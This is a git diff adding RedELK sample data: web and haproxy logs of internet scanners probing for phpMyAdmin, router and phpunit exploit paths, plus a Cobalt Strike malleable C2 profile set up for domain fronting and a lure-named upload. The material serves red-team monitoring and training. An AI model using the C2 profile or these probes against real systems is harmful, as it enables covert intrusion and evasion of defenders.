Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:40 UTC] "GET /phpMyAdminn/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:42 UTC] "GET /phpMyAdminhf/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:43 UTC] "GET /WWW/phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:48 UTC] "GET /phpMyAdmin_ai/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:48 UTC] "GET /__phpMyAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:48 UTC] "GET /program/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:49 UTC] "GET /shopdb/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:49 UTC] "GET /phppma/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:52 UTC] "GET /phpmy/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:52 UTC] "GET /mysql/admin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; 
Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:52 UTC] "GET /mysql/dbadmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:53 UTC] "GET /mysql/sqlmanager/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:53 UTC] "GET /mysql/mysqlmanager/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:53 UTC] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:54 UTC] "GET /sqladmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:56 UTC] "GET /sql/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:56 UTC] "GET /SQL/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:56 UTC] "GET /websql/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" +152.136.192.51 unknown unknown [03/31 08:06:57 UTC] "GET /MySQLAdmin/index.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36" 
+152.136.192.51 unknown unknown [03/31 08:06:57 UTC] "GET /manager/html" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" +23.225.172.10 unknown unknown [03/31 09:15:34 UTC] "CONNECT ip.ws.126.net:443" 404 0 "" "Go-http-client/1.1" +5.189.151.188 unknown unknown [03/31 09:23:39 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +5.189.151.188 unknown unknown [03/31 09:23:45 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +84.241.25.48 unknown unknown [03/31 09:26:13 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +167.99.40.21 unknown unknown [03/31 11:38:41 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +167.99.40.21 unknown unknown [03/31 11:38:44 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +167.99.40.21 unknown unknown [03/31 11:38:48 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +188.126.56.200 unknown unknown [03/31 11:52:53 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +31.220.48.125 unknown unknown [03/31 12:07:25 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +42.230.206.177 unknown unknown [03/31 12:15:39 UTC] "GET /setup.cgi" 404 0 "" "null" +5.188.210.101 unknown unknown [03/31 12:20:41 UTC] "GET http://5.188.210.101/echo.php" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" +162.243.129.179 unknown unknown [03/31 12:26:17 UTC] "GET /portal/redlion" 404 0 "" "Mozilla/5.0 zgrab/0.x" +139.162.106.181 unknown unknown [03/31 13:01:51 UTC] "GET /" 404 0 "" "HTTP Banner Detection 
(https://security.ipip.net)" +171.67.70.85 unknown unknown [03/31 13:17:30 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +122.160.15.69 unknown unknown [03/31 14:09:41 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +61.219.11.153 unknown unknown [03/31 15:35:02 UTC] "GET /" 404 0 "" "null" +139.99.141.237 unknown unknown [03/31 15:52:09 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +198.108.66.144 unknown unknown [03/31 16:20:32 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +80.82.65.234 unknown unknown [03/31 16:51:09 UTC] "POST /cgi-bin/mainfunction.cgi" 404 0 "" "Welcome" +94.182.51.146 unknown unknown [03/31 16:58:31 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +110.249.212.46 unknown unknown [03/31 17:53:09 UTC] "GET http://110.249.212.46/testget" 404 0 "" "null" +45.248.26.26 unknown unknown [03/31 18:10:03 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +171.67.70.85 unknown unknown [03/31 19:18:10 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +80.82.65.234 unknown unknown [03/31 19:47:47 UTC] "POST /cgi-bin/mainfunction.cgi" 404 0 "" "Welcome" +139.196.154.23 unknown unknown [03/31 21:36:11 UTC] "GET /TP/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +139.196.154.23 unknown unknown [03/31 21:36:11 UTC] "GET /TP/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +139.196.154.23 unknown unknown [03/31 21:36:12 UTC] "GET /thinkphp/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +139.196.154.23 unknown unknown [03/31 21:36:12 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows; U; 
Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
+37.49.226.140 unknown unknown [03/31 21:43:05 UTC] "GET /incl/image_test.shtml" 404 0 "" "null"
+96.225.45.30 unknown unknown [03/31 23:13:43 UTC] "POST /boaform/admin/formPing" 404 0 "" "polaris botnet"
+80.82.65.234 unknown unknown [03/31 23:56:38 UTC] "POST /cgi-bin/mainfunction.cgi" 404 0 "" "Welcome"
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200401/weblog_80.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200401/weblog_80.log
new file mode 100644
index 00000000..1d06370b
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200401/weblog_80.log
@@ -0,0 +1,54 @@ +51.254.59.113 unknown unknown [04/01 00:05:12 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" +171.67.70.85 unknown unknown [04/01 01:18:13 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +192.241.237.84 unknown unknown [04/01 01:23:10 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +159.65.11.106 unknown unknown [04/01 01:23:57 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +159.65.11.106 unknown unknown [04/01 01:24:03 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +54.213.3.215 unknown unknown [04/01 01:42:27 UTC] "OPTIONS /" 200 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" +138.75.193.254 unknown unknown [04/01 02:16:31 UTC] "POST /boaform/admin/formPing" 404 0 "" "polaris botnet" +71.6.232.4 unknown unknown [04/01 02:35:46 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" +45.182.136.232 unknown unknown [04/01 02:37:54 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +85.187.124.112 unknown unknown [04/01 02:37:57 UTC] "GET /" 404 0 "" "null" +145.220.25.28 unknown unknown [04/01 02:42:20 UTC] "GET /cgi-bin/mainfunction.cgi" 404 0 "" "Mozilla/5.0 zgrab/0.x" +2.179.112.8 unknown unknown [04/01 03:34:53 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +208.91.109.90 unknown unknown [04/01 04:29:51 UTC] "HEAD /robots.txt" 404 0 "" "null" +73.202.28.126 unknown unknown [04/01 05:48:16 UTC] "GET /" 404 0 "" "null" +95.38.210.99 unknown unknown [04/01 06:47:53 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/51.0.2704.103 Safari/537.36" +80.82.65.234 unknown unknown [04/01 07:20:05 UTC] "POST /cgi-bin/mainfunction.cgi" 404 0 "" "Welcome" +120.24.74.208 unknown unknown [04/01 07:31:20 UTC] "GET /TP/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +36.89.49.161 unknown unknown [04/01 07:32:24 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" +171.67.70.85 unknown unknown [04/01 07:32:26 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +175.24.138.30 unknown unknown [04/01 07:32:56 UTC] "GET /TP/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:32:56 UTC] "GET /TP/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:32:57 UTC] "GET /thinkphp/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:32:57 UTC] "GET /html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:32:58 UTC] "GET /public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:32:58 UTC] "GET /TP/html/public/index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:33:00 UTC] "GET /elrekt.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 unknown unknown [04/01 07:33:00 UTC] "GET /index.php" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +175.24.138.30 
unknown unknown [04/01 07:33:04 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)" +217.168.73.37 unknown unknown [04/01 07:39:00 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +208.91.109.90 unknown unknown [04/01 08:55:34 UTC] "HEAD /robots.txt" 404 0 "" "null" +124.82.96.138 unknown unknown [04/01 08:57:47 UTC] "GET /" 404 0 "" "null" +108.178.205.178 unknown unknown [04/01 10:19:18 UTC] "POST /cgi-bin/mainfunction.cgi" 404 0 "" "XTC" +162.243.130.216 unknown unknown [04/01 10:33:29 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +175.138.186.168 unknown unknown [04/01 10:57:50 UTC] "GET /" 404 0 "" "null" +193.121.10.12 unknown unknown [04/01 13:05:03 UTC] "GET /" 404 0 "" "null" +187.94.113.145 unknown unknown [04/01 13:10:39 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" +87.21.245.125 unknown unknown [04/01 13:27:07 UTC] "GET /shell" 404 0 "" "Mozilla/5.0" +171.67.70.85 unknown unknown [04/01 13:43:26 UTC] "GET /" 404 0 "" "Mozilla/5.0 zgrab/0.x" +42.189.87.55 unknown unknown [04/01 13:59:55 UTC] "GET /" 404 0 "" "null" +42.189.87.55 unknown unknown [04/01 13:59:57 UTC] "GET /" 404 0 "" "null" +5.189.176.208 unknown unknown [04/01 15:52:34 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)" +223.71.167.165 unknown unknown [04/01 15:57:48 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" +162.243.129.242 unknown unknown [04/01 17:11:12 UTC] "GET /portal/redlion" 404 0 "" "Mozilla/5.0 zgrab/0.x" +168.228.115.250 unknown unknown [04/01 17:32:59 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" +171.67.70.85 unknown unknown [04/01 19:44:56 UTC] "GET /" 404 0 "" 
"Mozilla/5.0 zgrab/0.x"
+71.6.146.186 unknown unknown [04/01 19:48:35 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
+71.6.146.186 unknown unknown [04/01 19:48:35 UTC] "GET /robots.txt" 404 0 "" "null"
+71.6.146.186 unknown unknown [04/01 19:48:36 UTC] "GET /sitemap.xml" 404 0 "" "null"
+71.6.146.186 unknown unknown [04/01 19:48:36 UTC] "GET /.well-known/security.txt" 404 0 "" "null"
+92.118.160.13 unknown unknown [04/01 20:26:42 UTC] "GET /" 404 0 "" "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com"
+95.27.223.221 unknown unknown [04/01 20:32:16 UTC] "GET /" 404 0 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
+51.68.70.66 unknown unknown [04/01 20:34:37 UTC] "GET /" 404 0 "" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
+23.30.23.174 unknown unknown [04/01 20:46:22 UTC] "POST /boaform/admin/formPing" 404 0 "" "polaris botnet"
+77.49.125.192 unknown unknown [04/01 20:56:08 UTC] "GET /shell" 404 0 "" "Hello, world"
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200402/weblog_80.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200402/weblog_80.log
new file mode 100644
index 00000000..13843b3a
Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200402/weblog_80.log differ
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200403/weblog_80.log b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200403/weblog_80.log
new file mode 100644
index 00000000..b8a538b4
Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/logs/200403/weblog_80.log differ
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/profiles/.DS_Store b/elkserver/mounts/sample-data/logs/cobaltstrike/profiles/.DS_Store
new file mode 100644
index 00000000..5008ddfc
Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/profiles/.DS_Store differ
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/profiles/MallableConfig-DomainFronting.profile b/elkserver/mounts/sample-data/logs/cobaltstrike/profiles/MallableConfig-DomainFronting.profile
new file mode 100644
index 00000000..275eff4b
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/cobaltstrike/profiles/MallableConfig-DomainFronting.profile
@@ -0,0 +1,69 @@
+# Part of RedELK
+#
+# This is a basic example mallable configuration file for CobaltStrike that works with RedELK
+#
+# Author: Outflank B.V. / Marc Smeets
+#
+# Important 1 - change the value of $NameOfYourDomainFrontingEndpoint in the config below to the name of your DomainFronting endpoint name, e.g. somefancyname.azureedgee.net
+# Important 2 - configure the listeners in CobaltStrike accordingly: set the HTTP Host Header to the name of your DomainFronting endpoint name, and set the HTTP Hosts to a frontable domain.
+#
+
+set sleeptime "5000";
+set jitter "10";
+set useragent "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko";
+
+http-config {
+ set headers "Date, Server, Content-Length, Keep-Alive, Connection, Content-Type";
+ header "Server" "Apache";
+ header "Keep-Alive" "timeout=5, max=100";
+ header "Connection" "Keep-Alive";
+ set trust_x_forwarded_for "true";
+}
+
+http-get {
+ set uri "/TRAINING-BEACON";
+
+ client {
+ header "Accept" "*/*";
+ header "Pragma" "no-cache";
+ header "Connection" "Keep-Alive";
+ header "Host" "redelkdemo.azureedge.net";
+ metadata {
+ base64;
+ header "Cookie";
+ }
+ }
+
+ server {
+ header "Content-Type" "application/octet-stream";
+
+ output {
+ print;
+ }
+ }
+}
+
+http-post {
+ set uri "/TRAINING-BEACON/submit.php";
+ client {
+ header "Content-Type" "application/octet-stream";
+ header "Host" "redelkdemo.azureedge.net";
+
+ id {
+ #netbios;
+ parameter "id";
+ }
+
+ output {
+ print;
+ }
+ }
+
+ server {
+ header "Content-Type" "text/html";
+
+ output {
+ print;
+ }
+ }
+}
diff --git a/elkserver/mounts/sample-data/logs/cobaltstrike/uploads/OfferNr2020F6592_salary.doc b/elkserver/mounts/sample-data/logs/cobaltstrike/uploads/OfferNr2020F6592_salary.doc
new file mode 100644
index 00000000..9c0ebf32
Binary files /dev/null and b/elkserver/mounts/sample-data/logs/cobaltstrike/uploads/OfferNr2020F6592_salary.doc differ
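Review bot: The header comment tells the reader to change `$NameOfYourDomainFrontingEndpoint` "in the config below", but no such placeholder exists in the file: both `header "Host"` lines (in http-get and http-post) are hard-coded to `redelkdemo.azureedge.net`, so a user following the instruction finds nothing to replace. Either reintroduce the placeholder in those two Host headers or reword the comment to name the literal, e.g. `# Important 1 - replace the value of the two "Host" headers below (redelkdemo.azureedge.net) with the name of your domain fronting endpoint`. The example hostname `somefancyname.azureedgee.net` has a doubled "e", and "mallable" (in the comment and in the file name) should be "Malleable". Separately, the `profiles/.DS_Store` added just before this file is a macOS desktop artifact and should be dropped and gitignored rather than committed.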
diff --git a/elkserver/mounts/sample-data/logs/haproxy.log b/elkserver/mounts/sample-data/logs/haproxy.log
new file mode 100644
index 00000000..4b538851
--- /dev/null
+++ b/elkserver/mounts/sample-data/logs/haproxy.log
@@ -0,0 +1,25 @@ +Apr 3 06:29:48 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:04:29:45 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:169.197.108.6:49196 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |167.71.58.116|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 07:05:56 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:05:05:53 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:70.113.157.223:41760 xforwardedfor:- headers:{|||||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 09:05:59 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:07:05:54 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:51.38.57.199:61000 xforwardedfor:- headers:{|masscan/1.0 (https://github.com/robertdavidgraham/masscan)||||||} statuscode:503 request:GET / HTTP/1.0 +Apr 3 09:06:05 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:07:06:00 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:51.38.57.199:61000 xforwardedfor:- headers:{|masscan/1.0 (https://github.com/robertdavidgraham/masscan)||||||} statuscode:503 request:GET / HTTP/1.0 +Apr 3 09:17:13 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:07:17:08 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:188.157.132.206:40459 xforwardedfor:- headers:{|||||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 09:20:47 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:07:20:44 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:188.157.132.206:43292 xforwardedfor:- headers:{|||||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 09:22:56 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:07:22:52 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:188.157.132.206:45081 xforwardedfor:- headers:{|||||||} 
statuscode:503 request:GET / HTTP/1.1 +Apr 3 09:43:40 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:07:43:37 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:117.102.229.246:53808 xforwardedfor:- headers:{|Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 10:11:30 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:08:11:27 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:95.7.54.51:48393 xforwardedfor:- headers:{|Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 10:39:44 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:08:39:44 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:www-http client:45.136.108.20:426 xforwardedfor:- headers:{|||||||} statuscode:400 request: +Apr 3 10:41:28 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:08:41:25 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:5.101.0.209:33604 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 +Apr 3 10:46:56 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:08:46:53 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:72.181.216.126:37570 xforwardedfor:- headers:{|XTC|127.0.0.1|||||} statuscode:503 request:POST /cgi-bin/mainfunction.cgi HTTP/1.1 +Apr 3 10:46:56 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:08:46:53 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:72.181.216.126:37563 xforwardedfor:- headers:{|XTC|127.0.0.1|||||} 
statuscode:503 request:POST /cgi-bin/mainfunction.cgi HTTP/1.1 +Apr 3 11:21:00 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:09:20:57 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:196.52.43.125:33233 xforwardedfor:- headers:{|Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3602.2 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 11:34:03 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:09:34:00 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:169.1.176.44:37548 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:GET / HTTP/1.1 +Apr 3 11:47:24 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:09:47:21 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:5.101.0.209:56686 xforwardedfor:- headers:{|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36|167.71.58.116:80|||||} statuscode:503 request:POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 +Apr 3 11:50:52 redelkdemo-redirb1 haproxy[7059]: GMT:03/Apr/2020:09:50:49 +0000 frontend:www-http/redelkdemo-redirb1/167.71.58.116:80 backend:decoy-www client:201.71.243.54:46670 xforwardedfor:- headers:{|Mozilla/5.0 (Macintosh; Intel Mac OS X 